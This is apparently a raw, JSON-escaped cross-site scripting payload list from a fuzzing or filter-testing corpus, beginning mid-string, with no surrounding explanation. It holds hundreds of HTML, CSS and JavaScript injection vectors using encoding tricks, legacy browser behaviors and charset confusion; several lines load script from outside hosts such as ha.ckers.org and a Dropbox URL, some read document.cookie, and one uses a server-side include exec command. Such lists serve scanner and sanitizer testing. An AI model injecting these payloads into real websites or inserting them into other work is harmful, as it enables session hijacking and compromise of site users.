onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x10=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x13=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x32=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x12=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x11=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x00=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x47=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x09onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x10onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x11onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x12onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x13onerror=\"javascript:alert(1)\"\u003e\n\u003cimg[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\"\u003e\n\u003cimg src=x onerror=\\x09\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x10\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x11\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x12\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x32\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x00\"javascript:alert(1)\"\u003e\n\u003ca href=java\u0026#1\u0026#2\u0026#3\u0026#4\u0026#5\u0026#6\u0026#7\u0026#8\u0026#11\u0026#12script:javascript:alert(1)\u003eXXX\u003c/a\u003e\n\u003cimg src=\"x` `\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"` `\u003e\n\u003cimg src onerror /\" '\"= alt=javascript:alert(1)//\"\u003e\n\u003ctitle onpropertychange=javascript:alert(1)\u003e\u003c/title\u003e\u003ctitle title=\u003e\n\u003ca href=http://foo.bar/#x=`y\u003e\u003c/a\u003e\u003cimg alt=\"`\u003e\u003cimg src=x:x onerror=javascript:alert(1)\u003e\u003c/a\u003e\"\u003e\n\u003c!--[if]\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script --\u003e\n\u003c!--[if\u003cimg src=x onerror=javascript:alert(1)//]\u003e --\u003e\n\u003cscript src=\"/\\%(jscript)s\"\u003e\u003c/script\u003e\n\u003cscript src=\"\\\\%(jscript)s\"\u003e\u003c/script\u003e\n\u003cobject id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"\u003e\u003c/object\u003e \u003cobject classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"\u003e\u003cparam name=postdomevents /\u003e\u003c/object\u003e\n\u003ca style=\"-o-link:'javascript:javascript:alert(1)';-o-link-source:current\"\u003eX\n\u003cstyle\u003ep[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};\u003c/style\u003e\n\u003clink rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\n\u003cstyle\u003e@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";\u003c/style\u003e\n\u003ca style=\"pointer-events:none;position:absolute;\"\u003e\u003ca style=\"position:absolute;\" onclick=\"javascript:alert(1);\"\u003eXXX\u003c/a\u003e\u003c/a\u003e\u003ca href=\"javascript:javascript:alert(1)\"\u003eXXX\u003c/a\u003e\n\u003cstyle\u003e*[{}@import'%(css)s?]\u003c/style\u003eX\n\u003cdiv style=\"font-family:'foo\u0026#10;;color:red;';\"\u003eXXX\n\u003cdiv style=\"font-family:foo}color=red;\"\u003eXXX\n\u003c// style=x:expression\\28javascript:alert(1)\\29\u003e\n\u003cstyle\u003e*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}\u003c/style\u003e\n\u003cdiv style=content:url(%(svg)s)\u003e\u003c/div\u003e\n\u003cdiv style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));\"\u003eX\n\u003cdiv id=d\u003e\u003cdiv style=\"font-family:'sans\\27\\3B color\\3Ared\\3B'\"\u003eX\u003c/div\u003e\u003c/div\u003e \u003cscript\u003ewith(document.getElementById(\"d\"))innerHTML=innerHTML\u003c/script\u003e\n\u003cdiv style=\"background:url(/f#\u0026#127;oo/;color:red/*/foo.jpg);\"\u003eX\n\u003cdiv style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\"\u003eX\n\u003cdiv id=\"x\"\u003eXXX\u003c/div\u003e \u003cstyle\u003e  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  \u003c/style\u003e\n\u003cx style=\"background:url('x\u0026#1;;color:red;/*')\"\u003eXXX\u003c/x\u003e\n\u003cscript\u003e({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval\u003c/script\u003e\n\u003cscript\u003e({0:#0=eval/#0#/#0#(javascript:alert(1))})\u003c/script\u003e\n\u003cscript\u003eReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x\u003c/script\u003e\n\u003cscript\u003eObject.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()\u003c/script\u003e\n\u003cmeta charset=\"x-imap4-modified-utf7\"\u003e\u0026ADz\u0026AGn\u0026AG0\u0026AEf\u0026ACA\u0026AHM\u0026AHI\u0026AGO\u0026AD0\u0026AGn\u0026ACA\u0026AG8Abg\u0026AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ\u0026ACAAPABi\n\u003cmeta charset=\"x-imap4-modified-utf7\"\u003e\u0026\u003cscript\u0026S1\u0026TS\u00261\u003ealert\u0026A7\u0026(1)\u0026R\u0026UA;\u0026\u0026\u003c\u0026A9\u002611/script\u0026X\u0026\u003e\n\u003cmeta charset=\"mac-farsi\"\u003e¼script¾javascript:alert(1)¼/script¾\nX\u003cx style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` \u003e\n1\u003cset/xmlns=`urn:schemas-microsoft-com:time` style=`beh\u0026#x41vior:url(#default#time2)` attributename=`innerhtml` to=`\u0026lt;img/src=\u0026quot;x\u0026quot;onerror=javascript:alert(1)\u0026gt;`\u003e\n1\u003canimate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=\u0026lt;img/src=\u0026quot;.\u0026quot;onerror=javascript:alert(1)\u0026gt;\u003e\n\u003cvmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss\u003e\u003c/vmlframe\u003e\n1\u003ca href=#\u003e\u003cline xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /\u003e\u003c/a\u003e\n\u003ca style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(1)\"\u003eXXX\u003c/a\u003e\n\u003cx style=\"behavior:url(%(sct)s)\"\u003e\n\u003cxml id=\"xss\" src=\"%(htc)s\"\u003e\u003c/xml\u003e \u003clabel dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"\u003e\u003c/label\u003e\n\u003cevent-source src=\"%(event)s\" onload=\"javascript:alert(1)\"\u003e\n\u003ca href=\"javascript:javascript:alert(1)\"\u003e\u003cevent-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\"\u003e\n\u003cdiv id=\"x\"\u003ex\u003c/div\u003e \u003cxml:namespace prefix=\"t\"\u003e \u003cimport namespace=\"t\" implementation=\"#default#time2\"\u003e \u003ct:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"\u0026lt;img\u0026#11;src=x:x\u0026#11;onerror\u0026#11;=javascript:alert(1)\u0026gt;\"\u003e\n\u003cscript\u003e%(payload)s\u003c/script\u003e\n\u003cscript src=%(jscript)s\u003e\u003c/script\u003e\n\u003cscript language='javascript' src='%(jscript)s'\u003e\u003c/script\u003e\n\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\n\u003cIMG SRC=\"javascript:javascript:alert(1);\"\u003e\n\u003cIMG SRC=javascript:javascript:alert(1)\u003e\n\u003cIMG SRC=`javascript:javascript:alert(1)`\u003e\n\u003cSCRIPT SRC=%(jscript)s?\u003cB\u003e\n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:javascript:alert(1);\"\u003e\u003c/FRAMESET\u003e\n\u003cBODY ONLOAD=javascript:alert(1)\u003e\n\u003cBODY ONLOAD=javascript:javascript:alert(1)\u003e\n\u003cIMG SRC=\"jav ascript:javascript:alert(1);\"\u003e\n\u003cBODY onload!#$%%\u0026()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)\u003e\n\u003cSCRIPT/SRC=\"%(jscript)s\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003e%(payload)s//\u003c\u003c/SCRIPT\u003e\n\u003cIMG SRC=\"javascript:javascript:alert(1)\"\n\u003ciframe src=%(scriptlet)s \u003c\n\u003cINPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(1);\"\u003e\n\u003cIMG DYNSRC=\"javascript:javascript:alert(1)\"\u003e\n\u003cIMG LOWSRC=\"javascript:javascript:alert(1)\"\u003e\n\u003cBGSOUND SRC=\"javascript:javascript:alert(1);\"\u003e\n\u003cBR SIZE=\"\u0026{javascript:alert(1)}\"\u003e\n\u003cLAYER SRC=\"%(scriptlet)s\"\u003e\u003c/LAYER\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(1);\"\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003c%(css)s\u003e; REL=stylesheet\"\u003e\n\u003cXSS STYLE=\"behavior: url(%(htc)s);\"\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:javascript:alert(1)\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(1);\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(1);\"\u003e\n\u003cIFRAME SRC=\"javascript:javascript:alert(1);\"\u003e\u003c/IFRAME\u003e\n\u003cTABLE BACKGROUND=\"javascript:javascript:alert(1)\"\u003e\n\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:javascript:alert(1)\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:javascript:alert(1))\"\u003e\n\u003cDIV STYLE=\"width:expression(javascript:alert(1));\"\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(1))\"\u003e\n\u003cXSS STYLE=\"xss:expression(javascript:alert(1))\"\u003e\n\u003cSTYLE TYPE=\"text/javascript\"\u003ejavascript:alert(1);\u003c/STYLE\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:javascript:alert(1)\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:javascript:alert(1)\")}\u003c/STYLE\u003e\n\u003c!--[if gte IE 4]\u003e\u003cSCRIPT\u003ejavascript:alert(1);\u003c/SCRIPT\u003e\u003c![endif]--\u003e\n\u003cBASE HREF=\"javascript:javascript:alert(1);//\"\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"%(scriptlet)s\"\u003e\u003c/OBJECT\u003e\n\u003cOBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e\u003cparam name=url value=javascript:javascript:alert(1)\u003e\u003c/OBJECT\u003e\n\u003cHTML xmlns:xss\u003e\u003c?import namespace=\"xss\" implementation=\"%(htc)s\"\u003e\u003cxss:xss\u003eXSS\u003c/xss:xss\u003e\u003c/HTML\u003e\"\"\",\"XML namespace.\"),(\"\"\"\u003cXML ID=\"xss\"\u003e\u003cI\u003e\u003cB\u003e\u0026lt;IMG SRC=\"javas\u003c!-- --\u003ecript:javascript:alert(1)\"\u0026gt;\u003c/B\u003e\u003c/I\u003e\u003c/XML\u003e\u003cSPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"\u003e\u003c/SPAN\u003e\n\u003cHTML\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u0026lt;SCRIPT DEFER\u0026gt;javascript:alert(1)\u0026lt;/SCRIPT\u0026gt;\"\u003e\u003c/BODY\u003e\u003c/HTML\u003e\n\u003cSCRIPT SRC=\"%(jpg)s\"\u003e\u003c/SCRIPT\u003e\n\u003cHEAD\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\n\u003cform id=\"test\" /\u003e\u003cbutton form=\"test\" formaction=\"javascript:javascript:alert(1)\"\u003eX\n\u003cbody onscroll=javascript:alert(1)\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\n\u003cP STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1)\"\u003e\n\u003cSTYLE\u003e@import'%(css)s';\u003c/STYLE\u003e\n\u003cSTYLE\u003ea{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}\u003c/STYLE\u003e\n\u003cmeta charset= \"x-imap4-modified-utf7\"\u0026\u0026\u003e\u0026\u0026\u003cscript\u0026\u0026\u003ejavascript:alert(1)\u0026\u0026;\u0026\u0026\u003c\u0026\u0026/script\u0026\u0026\u003e\n\u003cSCRIPT onreadystatechange=javascript:javascript:alert(1);\u003e\u003c/SCRIPT\u003e\n\u003cstyle onreadystatechange=javascript:javascript:alert(1);\u003e\u003c/style\u003e\n\u003c?xml version=\"1.0\"?\u003e\u003chtml:html xmlns:html='http://www.w3.org/1999/xhtml'\u003e\u003chtml:script\u003ejavascript:alert(1);\u003c/html:script\u003e\u003c/html:html\u003e\n\u003cembed code=%(scriptlet)s\u003e\u003c/embed\u003e\n\u003cembed code=javascript:javascript:alert(1);\u003e\u003c/embed\u003e\n\u003cembed src=%(jscript)s\u003e\u003c/embed\u003e\n\u003cframeset onload=javascript:javascript:alert(1)\u003e\u003c/frameset\u003e\n\u003cobject onerror=javascript:javascript:alert(1)\u003e\n\u003cembed type=\"image\" src=%(scriptlet)s\u003e\u003c/embed\u003e\n\u003cXML ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG SRC=\"javas]]\u003c![CDATA[cript:javascript:alert(1);\"\u003e]]\u003c/C\u003e\u003cX\u003e\u003c/xml\u003e\n\u003cIMG SRC=\u0026{javascript:alert(1);};\u003e\n\u003ca href=\"jav\u0026#65ascript:javascript:alert(1)\"\u003etest1\u003c/a\u003e\n\u003ca href=\"jav\u0026#97ascript:javascript:alert(1)\"\u003etest1\u003c/a\u003e\n\u003cembed width=500 height=500 code=\"data:text/html,\u003cscript\u003e%(payload)s\u003c/script\u003e\"\u003e\u003c/embed\u003e\n\u003ciframe srcdoc=\"\u0026LT;iframe\u0026sol;srcdoc=\u0026amp;lt;img\u0026sol;src=\u0026amp;apos;\u0026amp;apos;onerror=javascript:alert(1)\u0026amp;gt;\u003e\"\u003e\n';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\n\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js\u003e\u003c/SCRIPT\u003e\n\u003cIMG SRC=javascript:alert(\"XSS\")\u003e\n\u003cIMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`\u003e\n\u003ca onmouseover=\"alert(document.cookie)\"\u003exxs link\u003c/a\u003e\n\u003ca onmouseover=alert(document.cookie)\u003exxs link\u003c/a\u003e\n\u003cIMG SRC=# onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG SRC= onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\"\u003e\nperl -e 'print \"\u003cIMG SRC=java\\0script:alert(\\\"XSS\\\")\u003e\";' \u003e out\n\u003cIMG SRC=\" \u0026#14;  javascript:alert('XSS');\"\u003e\n\u003cSCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n\u003cSCRIPT/SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js?\u003c B \u003e\n\u003cSCRIPT SRC=//ha.ckers.org/.j\u003e\n\\\";alert('XSS');//\n\u003c/TITLE\u003e\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\u003c/br\u003e\n\u003cIMG SRC='vbscript:msgbox(\"XSS\")'\u003e\n\u003cIMG SRC=\"livescript:[code]\"\u003e\n\u003cBGSOUND SRC=\"javascript:alert('XSS');\"\u003e\n\u003cBR SIZE=\"\u0026{alert('XSS')}\"\u003e\n\u003cLINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"\u003e\n\u003cSTYLE\u003e@import'http://ha.ckers.org/xss.css';\u003c/STYLE\u003e\n\u003cMETA HTTP-EQUIV=\"Link\" Content=\"\u003chttp://ha.ckers.org/xss.css\u003e; REL=stylesheet\"\u003e\n\u003cSTYLE\u003eBODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}\u003c/STYLE\u003e\n\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'\u003e\n\u003cSTYLE TYPE=\"text/javascript\"\u003ealert('XSS');\u003c/STYLE\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\n\u003cXSS STYLE=\"behavior: url(xss.htc);\"\u003e\n¼script¾alert(¢XSS¢)¼/script¾\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"\u003e\n\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cIFRAME SRC=# onmouseover=\"alert(document.cookie)\"\u003e\u003c/IFRAME\u003e\n\u003cFRAMESET\u003e\u003cFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/FRAMESET\u003e\n\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\u003e\n\u003cDIV STYLE=\"background-image: url(\u0026#1;javascript:alert('XSS'))\"\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"\u003e\u003c/OBJECT\u003e\n\u003cEMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\n\u003cSCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"\u003e\u003c/SCRIPT\u003e\n\u003c!--#exec cmd=\"/bin/echo '\u003cSCR'\"--\u003e\u003c!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js\u003e\u003c/SCRIPT\u003e'\"--\u003e\n\u003c? echo('\u003cSCR)';echo('IPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e'); ?\u003e\n\u003cIMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"\u003e\nRedirect 302 /a.jpg http://victimsite.com/admin.asp\u0026deleteuser\n\u003cMETA HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=\u003cSCRIPT\u003ealert('XSS')\u003c/SCRIPT\u003e\"\u003e\n\u003cHEAD\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\u003cSCRIPT a=\"\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT =\"\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e\" '' SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT \"a='\u003e'\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=`\u003e` SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e'\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cA HREF=\"http://66.102.7.147/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://1113982867/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://0x42.0x0000066.0x7.0x93/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://0102.0146.0007.00000223/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"htt p://6 6.000146.0x7.147/\"\u003eXSS\u003c/A\u003e\n\u003ciframe  src=\"\u0026Tab;javascript:prompt(1)\u0026Tab;\"\u003e\n\u003csvg\u003e\u003cstyle\u003e{font-family\u0026colon;'\u003ciframe/onload=confirm(1)\u003e'\n\u003cinput/onmouseover=\"javaSCRIPT\u0026colon;confirm\u0026lpar;1\u0026rpar;\"\n\u003csVg\u003e\u003cscRipt \u003ealert\u0026lpar;1\u0026rpar; {Opera}\n\u003cimg/src=`` onerror=this.onerror=confirm(1)\n\u003cform\u003e\u003cisindex formaction=\"javascript\u0026colon;confirm(1)\"\n\u003cimg src=``\u0026NewLine; onerror=alert(1)\u0026NewLine;\n\u003cscript/\u0026Tab; src='https://dl.dropbox.com/u/13018058/js.js' /\u0026Tab;\u003e\u003c/script\u003e\n\u003cScRipT 5-0*3+9/3=\u003eprompt(1)\u003c/ScRipT giveanswerhere=?\n\u003ciframe/src=\"data:text/html;\u0026Tab;base64\u0026Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\"\u003e\n\u003cscript /**/\u003e/**/alert(1)/**/\u003c/script /**/\n\u0026#34;\u0026#62;\u003ch1/onmouseover='\\u0061lert(1)'\u003e\n\u003ciframe/src=\"data:text/html,\u003csvg \u0026#111;\u0026#110;load=alert(1)\u003e\"\u003e\n\u003cmeta content=\"\u0026NewLine; 1 \u0026NewLine;; JAVASCRIPT\u0026colon; alert(1)\" http-equiv=\"refresh\"/\u003e\n\u003csvg\u003e\u003cscript xlink:href=data\u0026colon;,window.open('https://www.google.com/')\u003e\u003c/script\n\u003csvg\u003e\u003cscript x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n\u003cmeta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\"\u003e\n\u003ciframe src=javascript\u0026colon;alert\u0026lpar;document\u0026period;location\u0026rpar;\u003e\n\u003cform\u003e\u003ca href=\"javascript:\\u0061lert\u0026#x28;1\u0026#x29;\"\u003eX\n\u003c/script\u003e\u003cimg/*/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/*/onerror='eval(src)'\u003e\n\u003cimg/\u0026#09;\u0026#10;\u0026#11; src=`~` onerror=prompt(1)\u003e\n\u003cform\u003e\u003ciframe \u0026#09;\u0026#10;\u0026#11; src=\"javascript\u0026#58;alert(1)\"\u0026#11;\u0026#10;\u0026#09;;\u003e\n\u003ca href=\"data:application/x-x509-user-cert;\u0026NewLine;base64\u0026NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u0026#09;\u0026#10;\u0026#11;\u003eX\u003c/a\nhttp://www.google\u003cscript .com\u003ealert(document.location)\u003c/script\n\u003ca\u0026#32;href\u0026#61;\u0026#91;\u0026#00;\u0026#93;\"\u0026#00; onmouseover=prompt\u0026#40;1\u0026#41;\u0026#47;\u0026#47;\"\u003eXYZ\u003c/a\n\u003cimg/src=@\u0026#32;\u0026#13; onerror = prompt('\u0026#49;')\n\u003cstyle/onload=prompt\u0026#40;'\u0026#88;\u0026#83;\u0026#83;'\u0026#41;\n\u003cscript ^__^\u003ealert(String.fromCharCode(49))\u003c/script ^__^\n\u003c/style \u0026#32;\u003e\u003cscript \u0026#32; :-(\u003e/**/alert(document.location)/**/\u003c/script \u0026#32; :-(\n\u0026#00;\u003c/form\u003e\u003cinput type\u0026#61;\"date\" onfocus=\"alert(1)\"\u003e\n\u003cform\u003e\u003ctextarea \u0026#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074\u0026#x28;1\u0026#x29;'\u003e\n\u003cscript /***/\u003e/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/\u003c/script /***/\n\u003ciframe srcdoc='\u0026lt;body onload=prompt\u0026lpar;1\u0026rpar;\u0026gt;'\u003e\n\u003ca href=\"javascript:void(0)\" onmouseover=\u0026NewLine;javascript:alert(1)\u0026NewLine;\u003eX\u003c/a\u003e\n\u003cscript ~~~\u003ealert(0%0)\u003c/script ~~~\u003e\n\u003cstyle/onload=\u0026lt;!--\u0026#09;\u0026gt;\u0026#10;alert\u0026#10;\u0026lpar;1\u0026rpar;\u003e\n\u003c///style///\u003e\u003cspan %2F onmousemove='alert\u0026lpar;1\u0026rpar;'\u003eSPAN\n\u003cimg/src='http://i.imgur.com/P8mL8.jpg' onmouseover=\u0026Tab;prompt(1)\n\u0026#34;\u0026#62;\u003csvg\u003e\u003cstyle\u003e{-o-link-source\u0026colon;'\u003cbody/onload=confirm(1)\u003e'\n\u0026#13;\u003cblink/\u0026#13; onmouseover=pr\u0026#x6F;mp\u0026#116;(1)\u003eOnMouseOver {Firefox \u0026 Opera}\n\u003cmarquee onstart='javascript:alert\u0026#x28;1\u0026#x29;'\u003e^__^\n\u003cdiv/style=\"width:expression(confirm(1))\"\u003eX\u003c/div\u003e {IE7}\n\u003ciframe// src=javaSCRIPT\u0026colon;alert(1)\n//\u003cform/action=javascript\u0026#x3A;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003e\u003cinput/type='submit'\u003e//\n/*iframe/src*/\u003ciframe/src=\"\u003ciframe/src=@\"/onload=prompt(1) 